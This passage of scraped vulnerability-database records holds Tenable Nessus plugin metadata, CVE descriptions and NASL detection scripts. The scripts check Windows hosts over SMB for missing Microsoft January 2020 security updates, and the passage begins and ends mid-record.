script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 
available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534310', '4534314');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, 
share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534310, 4534314])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:24:50", "description": "The remote Windows host is missing security update 4534288 or cumulative update 4534283. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. 
(CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534288: Windows Server 2012 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0615", "CVE-2020-0620", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534283.NASL", "href": "https://www.tenable.com/plugins/nessus/132861", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132861);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534288\");\n script_xref(name:\"MSKB\", value:\"4534283\");\n script_xref(name:\"MSFT\", value:\"MS20-4534288\");\n script_xref(name:\"MSFT\", value:\"MS20-4534283\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4534288: Windows Server 2012 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534288\nor cumulative update 4534283. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. 
An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\");\n # https://support.microsoft.com/en-us/help/4534288/windows-server-2012-update-kb4534288\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00a24f59\");\n # https://support.microsoft.com/en-us/help/4534283/windows-server-2012-update-kb4534283\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27812eb5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534288 or Cumulative Update KB4534283.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534288', '4534283');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534288, 4534283])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-20T20:45:26", "description": "The remote Windows host is missing security update 4534306.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in 
the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. 
(CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0622)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. 
(CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. (CVE-2020-0601)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534306: Windows 10 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2021-12-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534306.NASL", "href": "https://www.tenable.com/plugins/nessus/132865", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132865);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/13\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4534306\");\n script_xref(name:\"MSFT\", value:\"MS20-4534306\");\n\n script_name(english:\"KB4534306: Windows 10 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534306.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. 
An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete 